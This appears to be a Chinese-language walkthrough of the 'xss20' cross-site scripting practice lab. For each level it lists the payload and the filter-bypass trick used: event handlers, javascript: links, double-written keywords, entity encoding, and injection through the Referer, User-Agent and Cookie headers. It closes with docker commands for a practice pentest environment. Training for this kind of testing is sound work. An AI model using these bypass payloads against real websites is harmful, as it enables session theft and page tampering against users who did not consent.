xss20
推荐
14、15打不开
level_1
payload?name=<script>alert(1)</script>
level_2
payload?keyword="><script>alert(1)</script><"
level_3 HTML 事件属性
payload?keyword=1'onmouseover='window.alert()
- 其他可以利用的js事件
onmouseenter=alert() //当鼠标移动到就会触发
onclick=alert() //鼠标点击时就会触发,注意点击输入框
onchange=alert() //在域的内容改变时发生
oninput=alert() //在用户输入时触发
onmouseover=alert()//鼠标移动到就会触发level_4 html事件
payloadkeyword=1"onmouseover="window.alert()
level_5 标签href属性 链接触发
- 另一种方法
javascript:alert(1)
payload"><a href="javascript:alert(1)">a</a>"
level_6 大小混写绕过
没有大小写都过滤所以只要改变大小写绕过即可1
2
3
4
5$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
level_7 双写绕过
1 | $str =strtolower($_GET["keyword"]); |
双写即可
payload:alert(1)"><a hrhrefef="javasjavascriptcript">a</a>"
level_8 Unicode 编码绕过
<a href = "javascript:alert(1)">a</a>
与将s
unicode编码&#***;
后的<a href = "java&##115cript:alert(1)">a</a>
一致
level_9 注释绕过
payloadjavascript:alert(1)/*http://*/
&##115会被浏览器解析为s
level_10 显示隐藏表单
第十题会过滤<
、>
,同时只允许t_sort传值
1 | $str = $_GET["keyword"]; |
payload?t_sort=1" onmouseover=alert(1) type="text
level_11 更改Referer
此题由三个值可传keyword
、t_sort
、t_ref
但可利用的是t_ref
在HackBar上Referer=1"onmouseover=alert(1) type="text
level_12 更改User-Agent
根据view-source得知t_ua
对应请求头的User-Agent
可直接将上题的payload添加在User-Agent
上1"onmouseover=alert(1) type="text
level_13 更改Cookie
推荐使用fireFox上的cookie插件Open Cookie Manager
并将原cookie改为user=1"onmouseover=alert(1) type="text
level_14
打不开
1 | <html> |
level_15
苦恼。。。一样打不开
1 | <html ng-app> |
level_16 错误触发
传送门好评G胖数3吧
- 发现`/` `script` 空格 会被替代为` `
- 空格被替换,可利用Blanks来替换
Blanks=(‘%09’, ‘%0A’, ‘%0B’, ‘%0C’, ‘%0D’, ‘%0a’)
此题使用的方法是错误触发,
即onerror事件:当一项资源加载失败,加载资源的元素会触发一个Event接口的error事件,并执行该元素上的onerror()处理函数.<img%0Csrc=1%0Conerror="alert(1)">
level_17
- SWF 是Small Web Format 的缩写, 读作swiff),是用于多媒体,矢量图形和ActionScript的Adobe Flash文件格式。
?arg01=a&arg02=1%20onmouseover=alert(1)
1
2
3
4
ini_set("display_errors", 0);
echo "<embed src=xsf01.swf?".htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"])." width=100% heigth=100%>";
level_18
?arg01=a&arg02=1%20onmouseover=alert(1)
1 |
|
U_U 17、18好像就插件不同
level_19
level_20
使用docker快速搭建Permeate渗透测试系统实践
操作记录
service docker start
docker run --name mysqlserver -e MYSQL_ROOT_PASSWORD=123 -d -i -p 3309:3306 mysql:5.6
docker run --name permeate_test --link mysqlserver:db -d -i -p 8888:80 registry.cn-hangzhou.aliyuncs.com/daxia/websafe:init
docker exec permeate_test zsh -c "nginx && /usr/sbin/php-fpm7.2 -R"
Summary
先🕊为敬,时间不早了
大佬的XSS骚的一匹的笔记
目前看到比较好的Summary,找到更好再说